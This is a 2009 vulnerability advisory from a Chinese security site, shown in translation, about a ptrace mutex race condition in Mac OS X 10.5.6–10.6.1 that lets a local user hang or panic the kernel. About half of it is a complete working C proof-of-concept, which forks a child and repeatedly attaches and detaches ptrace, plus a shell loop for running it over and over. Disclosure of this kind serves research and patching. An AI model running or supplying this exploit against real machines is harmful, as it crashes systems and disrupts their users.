Apple Mac OS X ptrace Mutex Handling Local Denial of Service Vulnerability

Source: 岁月联盟 Editor: zhuzhu Date: 2009-11-11
Affected versions:
Apple Mac OS X 10.6.1
Apple Mac OS X 10.5.7
Apple Mac OS X 10.5.6
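Vulnerability description:
BUGTRAQ ID: 36915
Mac OS X is the operating system used on Apple's family of machines. The ptrace implementation in Mac OS X has a race condition in its mutex handling: the error can be triggered when the kernel attempts to interlock a mutex that has already been freed, leaving the kernel busy.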
<*References
Micheal Turner (wh1t3h4t3@yahoo.co.uk)

Links: http://secunia.com/advisories/37238/
http://marc.info/?l=full-disclosure&m=125734118204158&w=2
*>
Test method: [www.sebug.net]
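The programs (methods) provided on this site may carry security risks and are intended for security research and teaching only. Use at your own risk!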
/*
  Mac OS X 10.5.6-10.6.1 ptrace() mutex handling DoS
  ==================================================
  This code should be run in a loop and due to problems
  with mutex handling in ptrace a DoS can occur when a
  destroyed mutex is attempted to be interlocked by OSX
  kernel giving rise to a race condition. You may need
  to run this code multiple times.

  - Tested against 10.5.6
  - Tested against 10.5.7
  - Tested against 10.6.1

  while `true`;do ./prdelka-vs-APPLE-ptracepanic;done

  -- prdelka
*/
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/wait.h>   /* wait() */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>     /* fork(), execve(), usleep() */

int main(){
	pid_t pid;
	char *argv[] = {"id","","",0};
	char *envp[] = {"",0};
	pid = fork();
	if(pid == 0){
		/* child: short delay, then exec a short-lived program */
		usleep(100);
		execve("/usr/bin/id",argv,envp);
	}
	else{
		/* parent: attach to the child while it is starting up, then detach */
		usleep(820);
		if(ptrace(PT_ATTACH,pid,0,0)==0){
			printf("[ PID: %d has been caught!\n",pid);
			if(ptrace(PT_DETACH,pid,0,0)<0){
				perror("Evil happens.");
			}
			usleep(1);
			wait(0);
		}
		else{
			perror("Fail!");
		}
	}
	return(0);
}
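SEBUG security advice:
Vendor patch:
Apple
-----
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version:
http://www.apple.com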